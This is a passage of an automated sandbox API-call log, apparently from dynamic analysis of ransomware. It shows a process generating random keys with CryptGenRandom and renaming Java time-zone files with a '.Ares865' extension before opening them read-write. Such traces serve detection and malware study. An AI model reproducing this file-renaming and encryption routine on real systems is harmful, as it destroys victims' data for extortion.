szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.831] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.831] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.832] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Istanbul" | out: lpString1="Istanbul") returned="Istanbul" [0133.832] lstrlenW (lpString="Istanbul") returned 8 [0133.832] lstrlenW (lpString="Ares865") returned 7 [0133.832] lstrcmpiW (lpString1="stanbul", lpString2="Ares865") returned 1 [0133.832] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Istanbul.Ares865") returned 63 [0133.832] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Istanbul" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\istanbul"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Istanbul.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\istanbul.ares865"), dwFlags=0x1) returned 1 [0133.834] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Istanbul.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\istanbul.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.834] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1464) returned 1 [0133.835] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.835] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.835] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.838] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.839] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.839] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.839] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Kaliningrad" | out: lpString1="Kaliningrad") returned="Kaliningrad" [0133.839] lstrlenW (lpString="Kaliningrad") returned 11 [0133.839] lstrlenW (lpString="Ares865") returned 7 [0133.839] lstrcmpiW (lpString1="ningrad", lpString2="Ares865") returned 1 [0133.840] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kaliningrad.Ares865") returned 66 [0133.840] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kaliningrad" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\kaliningrad"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kaliningrad.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\kaliningrad.ares865"), dwFlags=0x1) returned 1 [0133.844] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kaliningrad.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\kaliningrad.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.844] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=681) returned 1 [0133.844] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.845] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.845] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.847] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.848] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.848] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.849] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Kiev" | out: lpString1="Kiev") returned="Kiev" [0133.849] lstrlenW (lpString="Kiev") returned 4 [0133.849] lstrlenW (lpString="Ares865") returned 7 [0133.849] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kiev.Ares865") returned 59 [0133.849] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kiev" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\kiev"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kiev.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\kiev.ares865"), dwFlags=0x1) returned 1 [0133.851] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kiev.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\kiev.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.851] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1048) returned 1 [0133.851] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.852] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.852] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.864] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.865] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.865] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.866] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Lisbon" | out: lpString1="Lisbon") returned="Lisbon" [0133.866] lstrlenW (lpString="Lisbon") returned 6 [0133.866] lstrlenW (lpString="Ares865") returned 7 [0133.866] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Lisbon.Ares865") returned 61 [0133.866] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Lisbon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\lisbon"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Lisbon.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\lisbon.ares865"), dwFlags=0x1) returned 1 [0133.868] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Lisbon.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\lisbon.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.868] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1868) returned 1 [0133.869] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.869] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.869] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.872] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.872] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.872] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.873] lstrcpyW (in: lpString1=0x2cce45e, lpString2="London" | out: lpString1="London") returned="London" [0133.873] lstrlenW (lpString="London") returned 6 [0133.873] lstrlenW (lpString="Ares865") returned 7 [0133.873] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\London.Ares865") returned 61 [0133.873] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\London" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\london"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\London.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\london.ares865"), dwFlags=0x1) returned 1 [0133.875] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\London.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\london.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.875] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2024) returned 1 [0133.876] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.876] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.876] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.879] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.879] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.879] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.880] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Luxembourg" | out: lpString1="Luxembourg") returned="Luxembourg" [0133.880] lstrlenW (lpString="Luxembourg") returned 10 [0133.880] lstrlenW (lpString="Ares865") returned 7 [0133.880] lstrcmpiW (lpString1="embourg", lpString2="Ares865") returned 1 [0133.880] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Luxembourg.Ares865") returned 65 [0133.880] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Luxembourg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\luxembourg"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Luxembourg.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\luxembourg.ares865"), dwFlags=0x1) returned 1 [0133.882] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Luxembourg.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\luxembourg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.882] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1568) returned 1 [0133.882] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.883] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.883] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.885] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.886] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.886] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.886] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Madrid" | out: lpString1="Madrid") returned="Madrid" [0133.886] lstrlenW (lpString="Madrid") returned 6 [0133.886] lstrlenW (lpString="Ares865") returned 7 [0133.887] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Madrid.Ares865") returned 61 [0133.887] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Madrid" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\madrid"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Madrid.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\madrid.ares865"), dwFlags=0x1) returned 1 [0133.890] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Madrid.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\madrid.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.890] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1416) returned 1 [0133.890] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.891] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.891] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.893] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.894] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.894] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.895] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Malta" | out: lpString1="Malta") returned="Malta" [0133.895] lstrlenW (lpString="Malta") returned 5 [0133.895] lstrlenW (lpString="Ares865") returned 7 [0133.895] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Malta.Ares865") returned 60 [0133.895] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Malta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\malta"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Malta.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\malta.ares865"), dwFlags=0x1) returned 1 [0133.897] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Malta.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\malta.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.897] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1440) returned 1 [0133.898] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.898] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.898] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.900] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.901] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.901] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.902] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Minsk" | out: lpString1="Minsk") returned="Minsk" [0133.902] lstrlenW (lpString="Minsk") returned 5 [0133.902] lstrlenW (lpString="Ares865") returned 7 [0133.902] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Minsk.Ares865") returned 60 [0133.902] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Minsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\minsk"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Minsk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\minsk.ares865"), dwFlags=0x1) returned 1 [0133.903] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Minsk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\minsk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.904] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=605) returned 1 [0133.904] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.905] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.905] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.909] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.910] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.910] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.911] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Monaco" | out: lpString1="Monaco") returned="Monaco" [0133.911] lstrlenW (lpString="Monaco") returned 6 [0133.911] lstrlenW (lpString="Ares865") returned 7 [0133.911] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Monaco.Ares865") returned 61 [0133.911] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Monaco" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\monaco"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Monaco.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\monaco.ares865"), dwFlags=0x1) returned 1 [0133.913] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Monaco.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\monaco.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.913] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1576) returned 1 [0133.913] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.914] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.914] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.916] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.917] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.917] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.917] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Moscow" | out: lpString1="Moscow") returned="Moscow" [0133.917] lstrlenW (lpString="Moscow") returned 6 [0133.917] lstrlenW (lpString="Ares865") returned 7 [0133.918] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Moscow.Ares865") returned 61 [0133.918] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Moscow" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\moscow"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Moscow.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\moscow.ares865"), dwFlags=0x1) returned 1 [0133.921] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Moscow.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\moscow.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.921] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=693) returned 1 [0133.921] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.922] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.922] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.942] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.943] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.943] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.944] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Oslo" | out: lpString1="Oslo") returned="Oslo" [0133.944] lstrlenW (lpString="Oslo") returned 4 [0133.944] lstrlenW (lpString="Ares865") returned 7 [0133.944] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Oslo.Ares865") returned 59 [0133.944] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Oslo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\oslo"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Oslo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\oslo.ares865"), dwFlags=0x1) returned 1 [0133.946] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Oslo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\oslo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.946] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1216) returned 1 [0133.946] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.947] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.947] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.950] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.951] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.951] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.951] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Paris" | out: lpString1="Paris") returned="Paris" [0133.951] lstrlenW (lpString="Paris") returned 5 [0133.951] lstrlenW (lpString="Ares865") returned 7 [0133.951] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Paris.Ares865") returned 60 [0133.952] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Paris" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\paris"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Paris.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\paris.ares865"), dwFlags=0x1) returned 1 [0133.953] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Paris.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\paris.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.953] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1568) returned 1 [0133.954] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.954] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.954] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.958] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, 